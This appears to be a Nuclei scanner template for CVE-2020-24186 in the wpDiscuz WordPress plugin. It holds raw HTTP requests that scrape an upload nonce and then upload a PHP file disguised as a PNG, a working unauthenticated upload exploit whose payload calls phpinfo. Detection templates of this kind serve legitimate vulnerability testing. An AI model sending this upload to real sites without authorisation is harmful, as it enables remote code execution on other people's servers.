88 lines
2.6 KiB
YAML
88 lines
2.6 KiB
YAML
id: CVE-2020-24186
|
|
|
|
info:
|
|
name: Unauthenticated File upload wpDiscuz WordPress plugin Remote Code Execution
|
|
author: Ganofins
|
|
severity: critical
|
|
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
|
reference:
|
|
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10.00
|
|
cve-id: CVE-2020-24186
|
|
cwe-id: CWE-434
|
|
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
wmuUploadFiles
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_nonce"
|
|
|
|
{{wmuSecurity}}
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
|
|
|
undefined
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
|
Content-Type: image/png
|
|
|
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="postId"
|
|
|
|
1
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
internal: true
|
|
name: wmuSecurity
|
|
group: 1
|
|
regex:
|
|
- 'wmuSecurity":"([a-z0-9]+)'
|
|
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'success":true'
|
|
- 'fullname'
|
|
- 'shortname'
|
|
- 'url'
|
|
condition: and
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/03/27
|